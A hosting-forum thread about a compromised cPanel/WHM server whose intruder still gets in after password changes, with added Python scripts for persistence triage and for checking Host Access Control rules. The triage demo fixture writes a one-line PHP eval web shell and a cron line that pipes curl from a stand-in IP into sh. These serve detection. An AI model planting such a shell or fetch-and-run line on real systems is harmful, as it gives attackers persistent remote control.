Compromised Server Questions
Hi,
A hacker has been able to infiltrate my server with cPanel / WHM.
He's currently able to create / suspend / unsuspend accounts, as well as log into some FTP accounts and inject PHP files.
I have changed every password, but he still has access to the server. I really don't know how he can still access the server.
Here's an example from the log file of how an account was created:
Jun 24 17:01:58 main named[2867]: received control channel command 'reconfig'
Jun 24 17:01:58 main named[2867]: loading configuration from '/etc/named.conf'
Jun 24 17:01:58 main named[2867]: using default UDP/IPv4 port range: [1024, 65535]
Jun 24 17:01:58 main named[2867]: using default UDP/IPv6 port range: [1024, 65535]
Jun 24 17:01:58 main named[2867]: couldn't mkdir '/var/run/named': Permission denied
Jun 24 17:01:58 main named[2867]: generating session key for dynamic DNS
Jun 24 17:01:59 main named[2867]: couldn't mkdir '/var/run/named': Permission denied
Jun 24 17:01:59 main named[2867]: could not create /var/run/named/session.key
Jun 24 17:01:59 main named[2867]: failed to generate session key for dynamic DNS: permission denied
Jun 24 17:01:59 main named[2867]: sizing zone task pool based on 131 zones
Jun 24 17:01:59 main named[2867]: Warning: view localhost_resolver: 'empty-zones-enable/disable-empty-zone' not set: disabling RFC 1918 empty zones
Jun 24 17:01:59 main named[2867]: Warning: view internal: 'empty-zones-enable/disable-empty-zone' not set: disabling RFC 1918 empty zones
Jun 24 17:01:59 main named[2867]: reloading configuration succeeded
Jun 24 17:01:59 main named[2867]: zone hackerdomain.com/IN/internal: loaded serial 2015062401
Jun 24 17:01:59 main named[2867]: zone hackerdomain.com/IN/external: loaded serial 2015062401
Jun 24 17:01:59 main named[2867]: any newly configured zones are now loaded
Jun 24 17:01:59 main named[2867]: zone hackerdomain.com/IN/internal: sending notifies (serial 2015062401)
Jun 24 17:01:59 main named[2867]: zone hackerdomain.com/IN/external: sending notifies (serial 2015062401)
Jun 24 17:02:03 main named[2867]: received control channel command 'reload hackerdomain.com IN external'
Jun 24 17:02:03 main named[2867]: zone hackerdomain.com/IN/external: loaded serial 2015062403
Jun 24 17:02:03 main named[2867]: received control channel command 'reload hackerdomain.com IN internal'
Jun 24 17:02:03 main named[2867]: zone hackerdomain.com/IN/internal: loaded serial 2015062403
Jun 24 17:02:04 main named[2867]: zone hackerdomain.com/IN/internal: sending notifies (serial 2015062403)
Jun 24 17:02:04 main named[2867]: zone hackerdomain.com/IN/external: sending notifies (serial 2015062403)
And here's the email that cPanel sent to me:
New Account created.
Domain: hackerdomain.com
IP Address: xxx.xx.xx.xx (Shared)
CGI Access: Enabled
Username: hackerdomain
Password: ***HIDDEN***
cPanel Theme: x3
Home Directory: /home
Quota: 15,000 MB
Name Server 1: swdomains.venus.orderbox-dns.com
Name Server 2: swdomains.mercury.orderbox-dns.com
Name Server 3: swdomains.mars.orderbox-dns.com
Name Server 4: swdomains.earth.orderbox-dns.com
Contact Email: admin@hackerdomain.com
Package: giga
Feature List: default
Locale: en
The account was set up by the reseller "main" with the effective user ID of "root".
Does someone have an idea on how the hacker can access the server? Thank you in advance for your help.
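The situation described above (every password changed, attacker still in) is almost always explained by something that does not depend on a password. The script below is an added example, not code from this thread or from cPanel; it inventories the usual suspects on a cPanel/WHM box: recently modified PHP files under /home (the injected files the post mentions), SSH authorized_keys for root and every user, WHM .accesshash remote-access keys, per-user crontabs, and recently created account files under /var/cpanel/users. The paths follow cPanel's usual layout as I know it and are assumptions; so are the fixture built by demo(), the "victim" and "hackerdomain" account names and the address 198.51.100.7. Run it as root against "/" (or against a mounted image of the disk) and treat every hit as something that must be explained before the box is trusted again.

```python
"""Persistence triage for a cPanel/WHM host after every password was rotated.

Added example, not code from the thread or from cPanel. Walks a filesystem root
("/" on the live box, a mounted image, or the constructed fixture from demo()).
Paths are assumptions based on cPanel's usual layout.
"""
import os
import tempfile
import time

DAY = 86400


def _active_lines(path):
    """Non-empty, non-comment lines (authorized_keys, crontab)."""
    with open(path) as fh:
        return [ln.strip() for ln in fh if ln.strip() and not ln.lstrip().startswith("#")]


def _recent(path, days, now):
    return now - os.stat(path).st_mtime < days * DAY


def _home_dirs(root):
    home = os.path.join(root, "home")
    return [os.path.join(home, u) for u in sorted(os.listdir(home))] if os.path.isdir(home) else []


def recent_php_files(root, days, now):
    """PHP files under /home touched within `days`: where injected shells land."""
    hits = []
    for dirpath, _, files in os.walk(os.path.join(root, "home")):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(".php") and _recent(path, days, now):
                hits.append(path)
    return sorted(hits)


def authorized_keys(root):
    """SSH keys keep working no matter how many passwords were changed."""
    found = {}
    for base in [os.path.join(root, "root")] + _home_dirs(root):
        path = os.path.join(base, ".ssh", "authorized_keys")
        lines = _active_lines(path) if os.path.isfile(path) else []
        if lines:
            found[path] = lines
    return found


def access_hashes(root):
    """WHM .accesshash files (assumed location) authenticate API calls with no password."""
    bases = [os.path.join(root, "root")] + _home_dirs(root)
    return [p for p in (os.path.join(b, ".accesshash") for b in bases) if os.path.isfile(p)]


def cron_entries(root):
    """Per-user crontab lines (/var/spool/cron/<user>); cron is how a 'cleaned' shell comes back."""
    spool = os.path.join(root, "var", "spool", "cron")
    found = {}
    for user in (sorted(os.listdir(spool)) if os.path.isdir(spool) else []):
        path = os.path.join(spool, user)
        lines = _active_lines(path) if os.path.isfile(path) else []
        if lines:
            found[user] = lines
    return found


def recent_accounts(root, days, now):
    """cPanel account files (/var/cpanel/users/<user>) created or changed within `days`."""
    users = os.path.join(root, "var", "cpanel", "users")
    if not os.path.isdir(users):
        return []
    return sorted(u for u in os.listdir(users) if _recent(os.path.join(users, u), days, now))


def triage(root="/", days=7, now=None):
    now = time.time() if now is None else now
    return {
        "recent_php": recent_php_files(root, days, now),
        "authorized_keys": authorized_keys(root),
        "access_hashes": access_hashes(root),
        "cron": cron_entries(root),
        "recent_accounts": recent_accounts(root, days, now),
    }


def demo():
    """Build a constructed fixture resembling the thread's server, then triage it."""
    root = tempfile.mkdtemp(prefix="cpanel-triage-")
    now = time.time()
    fixture = {  # relative path: (content, mtime); all of this is made up for the example
        "home/victim/public_html/index.php": ("<?php echo 'site'; ?>\n", now - 90 * DAY),
        "home/victim/public_html/wp-cache.php": ("<?php eval($_POST['c']); ?>\n", now),
        "root/.ssh/authorized_keys": ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA attacker\n", now),
        "root/.accesshash": ("0123456789abcdef\n", now),
        "var/spool/cron/victim": ("# re-drops the shell\n*/5 * * * * curl -s http://198.51.100.7/s | sh\n", now),
        "var/cpanel/users/hackerdomain": ("DNS=hackerdomain.com\nOWNER=main\n", now),
        "var/cpanel/users/victim": ("DNS=victim.example\nOWNER=root\n", now - 400 * DAY),
    }
    for rel, (content, mtime) in fixture.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.utime(path, (mtime, mtime))
    return root, triage(root, days=7, now=now)


if __name__ == "__main__":
    _, report = demo()
    for section, value in report.items():
        print(f"== {section} ==", value or "(nothing found)")
```

A clean result on every section still does not prove the host is clean (a modified binary or a second reseller with root-equivalent ACLs would not show up here), which is why the first reply's advice to rebuild from a known-good image and restore from backups stands; the script's value is in showing how the attacker got back in, so the same hole is not restored along with the accounts.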
If you believe your server is compromised, and you're unsure of the way forward, you should look into hiring a professional to assist you. Waiting for a reply on the forum is not the best way to go here. cPanel cannot assist you with a compromised server. You might want to contact your Hosting Provider or Data Center for suggestions on locking down that server until you can get a security professional to assist you with cleaning it up, if that's even possible. Once the server is compromised, the only real, best option is to reload the server from scratch and restore accounts from safe backups. Good luck with this.
Alex. I know nothing regarding security, so I'm not really placed to offer any clean up assistance, however I am intrigued. Did you change the root password? If reloading the server is not an option, then I'd like to suggest that you configure Host Access Control so that only your own IPs are granted access to these areas. This might afford you some time to seek further advice.
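On the Host Access Control suggestion in the comment above: cPanel writes those rules into /etc/hosts.allow in hosts_access(5) form, daemon : client : action, evaluated first match wins, and a client that matches nothing (with an empty hosts.deny) is allowed. The checker below is an added example, not cPanel's code; it evaluates two constructed rule sets, one that only adds allow lines and one that follows each allow with an ALL : deny, and reports which daemons an outside address could still reach. The daemon names whostmgrd, cpaneld, webmaild and sshd, the example addresses, and the IPv4-only pattern handling are assumptions.

```python
"""First-match check of TCP-wrappers rules as cPanel's Host Access Control writes them.

Added example, not cPanel's code. Rule form is hosts_access(5): "daemon : client
: action"; the daemon names and both rule sets are assumptions. IPv4 patterns
only, and the EXCEPT operator is rejected rather than interpreted.
"""
import ipaddress

ADMIN_DAEMONS = ["whostmgrd", "cpaneld", "webmaild", "sshd"]  # assumed cPanel service names

# Constructed: a "lockdown" that only ever adds allow lines.
WEAK_RULES = """
# my office
whostmgrd : 203.0.113.10 : allow
cpaneld   : 203.0.113.10 : allow
sshd      : 203.0.113.10 : allow
"""

# Constructed: allow your own addresses, then deny everyone else, per daemon.
HARDENED_RULES = """
whostmgrd, cpaneld, webmaild : 203.0.113.10, 198.51.100.0/24 : allow
whostmgrd, cpaneld, webmaild : ALL : deny
sshd : 203.0.113.10 : allow
sshd : ALL : deny
"""


def parse_rules(text):
    """Return [(daemons, clients, action)] in file order; a missing action means allow."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if "EXCEPT" in line.upper():
            raise ValueError(f"EXCEPT not supported by this checker: {raw!r}")
        fields = [f.strip() for f in line.split(":")]
        if len(fields) < 2:
            raise ValueError(f"malformed rule: {raw!r}")
        action = fields[2].lower() if len(fields) > 2 else "allow"
        if action not in ("allow", "deny"):
            raise ValueError(f"unknown action {action!r} in {raw!r}")
        daemons = [d.strip() for d in fields[0].split(",")]
        clients = [c.strip() for c in fields[1].split(",")]
        rules.append((daemons, clients, action))
    return rules


def _client_matches(pattern, ip):
    """Client patterns handled: ALL, exact address, net/mask or CIDR, 'a.b.c.' prefix.
    Hostname patterns are not handled and raise ValueError from ipaddress."""
    if pattern == "ALL":
        return True
    if pattern.endswith("."):
        return ip.startswith(pattern)
    addr = ipaddress.ip_address(ip)
    if "/" in pattern:
        return addr in ipaddress.ip_network(pattern, strict=False)
    return addr == ipaddress.ip_address(pattern)


def decide(rules, daemon, ip):
    """First matching rule wins; with no match (and an empty hosts.deny) wrappers allow."""
    for daemons, clients, action in rules:
        if ("ALL" in daemons or daemon in daemons) and any(_client_matches(c, ip) for c in clients):
            return action
    return "allow"


def unguarded_daemons(rules, daemons=ADMIN_DAEMONS, outsider="192.0.2.99"):
    """Daemons an arbitrary outside address can still reach under these rules."""
    return [d for d in daemons if decide(rules, d, outsider) == "allow"]


if __name__ == "__main__":
    for label, text in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        print(f"{label}: still open to outsiders -> {unguarded_daemons(parse_rules(text))}")
```

The point of the weak set is that allow lines on their own restrict nothing: a client that matches no line falls through to the default, so every daemon stays reachable from anywhere until a deny line follows the allow for that daemon. Lock yourself in with the allow line before adding the deny, and keep an out-of-band console from the host or data center in case the address you allowed changes.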